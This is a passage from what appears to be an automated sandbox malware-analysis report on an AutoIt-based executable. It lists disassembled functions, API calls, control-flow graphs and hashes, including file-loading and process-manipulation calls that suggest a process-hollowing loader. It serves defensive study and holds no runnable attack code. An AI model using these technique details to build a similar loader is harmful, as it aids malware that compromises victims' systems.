                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
                                                                                        • API String ID: 1825951767-3937808951
                                                                                        • Opcode ID: bdb735fbedb35e888c257e8634ea341575bcf89834c003d18e08814175aecafe
                                                                                        • Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
                                                                                        • Opcode Fuzzy Hash: bdb735fbedb35e888c257e8634ea341575bcf89834c003d18e08814175aecafe
                                                                                        • Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9
                                                                                        Function 0040F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                                                          • Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154
                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
                                                                                        • OleInitialize.OLE32(00000000), ref: 0040FA4A
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004445C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                        • String ID: <WL$\TL$%I$SL
                                                                                        • API String ID: 1986988660-4199584472
                                                                                        • Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                                                        • Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
                                                                                        • Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                                                        • Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D
                                                                                        Function 00D6F880 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2031 d6f880-d6f92e call d6d250 2034 d6f935-d6f95b call d70790 CreateFileW 2031->2034 2037 d6f962-d6f972 2034->2037 2038 d6f95d 2034->2038 2043 d6f974 2037->2043 2044 d6f979-d6f993 VirtualAlloc 2037->2044 2039 d6faad-d6fab1 2038->2039 2041 d6faf3-d6faf6 2039->2041 2042 d6fab3-d6fab7 2039->2042 2045 d6faf9-d6fb00 2041->2045 2046 d6fac3-d6fac7 2042->2046 2047 d6fab9-d6fabc 2042->2047 2043->2039 2050 d6f995 2044->2050 2051 d6f99a-d6f9b1 ReadFile 2044->2051 2052 d6fb55-d6fb6a 2045->2052 2053 d6fb02-d6fb0d 2045->2053 2048 d6fad7-d6fadb 2046->2048 2049 d6fac9-d6fad3 2046->2049 2047->2046 2056 d6fadd-d6fae7 2048->2056 2057 d6faeb 2048->2057 2049->2048 2050->2039 2058 d6f9b3 2051->2058 2059 d6f9b8-d6f9f8 VirtualAlloc 2051->2059 2054 d6fb6c-d6fb77 VirtualFree 2052->2054 2055 d6fb7a-d6fb82 2052->2055 2060 d6fb11-d6fb1d 2053->2060 2061 d6fb0f 2053->2061 2054->2055 2056->2057 2057->2041 2058->2039 2062 d6f9ff-d6fa1a call d709e0 2059->2062 2063 d6f9fa 2059->2063 2064 d6fb31-d6fb3d 2060->2064 2065 d6fb1f-d6fb2f 2060->2065 2061->2052 2071 d6fa25-d6fa2f 2062->2071 2063->2039 2066 d6fb3f-d6fb48 2064->2066 2067 d6fb4a-d6fb50 2064->2067 2069 d6fb53 2065->2069 2066->2069 2067->2069 2069->2045 2072 d6fa62-d6fa76 call d707f0 2071->2072 2073 d6fa31-d6fa60 call d709e0 2071->2073 2079 d6fa7a-d6fa7e 2072->2079 2080 d6fa78 2072->2080 2073->2071 2081 d6fa80-d6fa84 CloseHandle 2079->2081 2082 d6fa8a-d6fa8e 2079->2082 2080->2039 2081->2082 2083 d6fa90-d6fa9b VirtualFree 2082->2083 2084 d6fa9e-d6faa7 2082->2084 2083->2084 2084->2034 2084->2039
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D6F951
                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D6FB77
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2314927041.0000000000D6D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d6d000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileFreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 204039940-0
                                                                                        • Opcode ID: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                                                        • Instruction ID: 9fa22aa721a50c7b72c75b5dbdd936d98efab6cf4784c14868ffb1e0ab7f7e86
                                                                                        • Opcode Fuzzy Hash: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                                                        • Instruction Fuzzy Hash: 61A10470E00209EBDB14CFE4D895BAEBBB5FF48304F248169E555AB280D7759A81CFA4
                                                                                        Function 004039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2162 4039d5-403a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                                                        • ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                                                        • ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CreateShow
                                                                                        • String ID: AutoIt v3$edit
                                                                                        • API String ID: 1584632944-3779509399
                                                                                        • Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                                                        • Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
                                                                                        • Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                                                        • Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8
                                                                                        Function 00D6F600 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2515 d6f600-d6f775 call d6d250 call d6f4f0 CreateFileW 2522 d6f777 2515->2522 2523 d6f77c-d6f78c 2515->2523 2524 d6f82c-d6f831 2522->2524 2526 d6f793-d6f7ad VirtualAlloc 2523->2526 2527 d6f78e 2523->2527 2528 d6f7b1-d6f7c8 ReadFile 2526->2528 2529 d6f7af 2526->2529 2527->2524 2530 d6f7cc-d6f806 call d6f530 call d6e4f0 2528->2530 2531 d6f7ca 2528->2531 2529->2524 2536 d6f822-d6f82a ExitProcess 2530->2536 2537 d6f808-d6f81d call d6f580 2530->2537 2531->2524 2536->2524 2537->2536
                                                                                        APIs
                                                                                          • Part of subcall function 00D6F4F0: Sleep.KERNEL32(000001F4), ref: 00D6F501
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D6F768
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2314927041.0000000000D6D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d6d000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileSleep
                                                                                        • String ID: 59XRD57N87NPFF2ULKUJMPRS61P
                                                                                        • API String ID: 2694422964-888265534
                                                                                        • Opcode ID: f9639d6a79bfbc439064e27ec024d96671f1329774dddcc49b405c3559e65f90
                                                                                        • Instruction ID: 24d7da89afa009c9464f7728de382a949a0663132d9e6b07f4a3c2564726d00f
                                                                                        • Opcode Fuzzy Hash: f9639d6a79bfbc439064e27ec024d96671f1329774dddcc49b405c3559e65f90
                                                                                        • Instruction Fuzzy Hash: 7C619130D04288DBEB11DBA4D844BEFBB75AF19304F0441A9E648BB2C1D7B95B45CBB6
                                                                                        Function 0040407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2539 40407c-404092 2540 404098-4040ad call 407a16 2539->2540 2541 40416f-404173 2539->2541 2544 4040b3-4040d3 call 407bcc 2540->2544 2545 43d3c8-43d3d7 LoadStringW 2540->2545 2548 43d3e2-43d3fa call 407b2e call 406fe3 2544->2548 2550 4040d9-4040dd 2544->2550 2545->2548 2557 4040ed-40416a call 422de0 call 40454e call 422dbc Shell_NotifyIconW call 405904 2548->2557 2561 43d400-43d41e call 407cab call 406fe3 call 407cab 2548->2561 2552 4040e3-4040e8 call 407b2e 2550->2552 2553 404174-40417d call 408047 2550->2553 2552->2557 2553->2557 2557->2541 2561->2557
                                                                                        APIs
                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                        • _memset.LIBCMT ref: 004040FC
                                                                                        • _wcscpy.LIBCMT ref: 00404150
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                        • String ID: Line:
                                                                                        • API String ID: 3942752672-1585850449
                                                                                        • Opcode ID: 1bad5c4e2ddd4e6fd89135438c19b354787e2bb84470972a128f45ab23fe358d
                                                                                        • Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
                                                                                        • Opcode Fuzzy Hash: 1bad5c4e2ddd4e6fd89135438c19b354787e2bb84470972a128f45ab23fe358d
                                                                                        • Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F
                                                                                        Function 00D6E4F0 Relevance: 8.2, APIs: 5, Instructions: 720processthreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessW.KERNEL32(?,00000000), ref: 00D6ECAB
                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D6ED41
                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00D6ED63
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2314927041.0000000000D6D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d6d000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 2438371351-0
                                                                                        • Opcode ID: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
                                                                                        • Instruction ID: 1255aefd97d2c2f79ef1b1b79539b188ad8bec3e1c684f5f10fb073d5288a5a3
                                                                                        • Opcode Fuzzy Hash: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
                                                                                        • Instruction Fuzzy Hash: 7F621E34A14658DBEB24CFA4C850BDEB372EF58300F1091A9D10DEB395E7769E81CB69
                                                                                        Function 0040686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                                                        • _free.LIBCMT ref: 0043E263
                                                                                        • _free.LIBCMT ref: 0043E2AA
                                                                                          • Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                        • API String ID: 2861923089-1757145024
                                                                                        • Opcode ID: f413f2e7c434e9e03e9f16404d873b79b547acec2a3101a96d959fb79dc57132
                                                                                        • Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
                                                                                        • Opcode Fuzzy Hash: f413f2e7c434e9e03e9f16404d873b79b547acec2a3101a96d959fb79dc57132
                                                                                        • Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59
                                                                                        Function 004035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: Control Panel\Mouse
                                                                                        • API String ID: 3677997916-824357125
                                                                                        • Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                                                        • Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
                                                                                        • Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                                                        • Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768
                                                                                        Function 0046955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                                                          • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                                                          • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                                                        • _free.LIBCMT ref: 004696A2
                                                                                        • _free.LIBCMT ref: 004696A9
                                                                                        • _free.LIBCMT ref: 00469714
                                                                                          • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                                                          • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                                                        • _free.LIBCMT ref: 0046971C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                        • String ID:
                                                                                        • API String ID: 1552873950-0
                                                                                        • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                        • Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
                                                                                        • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                        • Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59
                                                                                        Function 0042470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2782032738-0
                                                                                        • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                        • Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
                                                                                        • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                        • Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48
                                                                                        Function 00ACB180 Relevance: 6.1, APIs: 4, Instructions: 95fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetFilePointerEx.KERNEL32 ref: 00ACB2BA
                                                                                        • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 00ACB2E0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$PointerWrite
                                                                                        • String ID:
                                                                                        • API String ID: 539440098-0
                                                                                        • Opcode ID: ce007f26b5e7be0c3ab7b88fb6babf04beb87d51989558971e0926f189d85a1b
                                                                                        • Instruction ID: 40eff5da78d80b060f990eceed6f14c5ce3bf45e74ea179d51d3926f44110996
                                                                                        • Opcode Fuzzy Hash: ce007f26b5e7be0c3ab7b88fb6babf04beb87d51989558971e0926f189d85a1b
                                                                                        • Instruction Fuzzy Hash: 3131A57052C380AED7118B258817F6FBFE46F92714F4A894DE4D49B691D3B7880887B3
                                                                                        Function 00404C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID: AU3!P/I$EA06
                                                                                        • API String ID: 4104443479-1914660620
                                                                                        • Opcode ID: 16f5da041bfe5336b7d6228a32569345bac751845b8ec38fb7b22f9adfc250c8
                                                                                        • Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
                                                                                        • Opcode Fuzzy Hash: 16f5da041bfe5336b7d6228a32569345bac751845b8ec38fb7b22f9adfc250c8
                                                                                        • Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA
                                                                                        Function 00407285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 0043EA39
                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 0043EA83
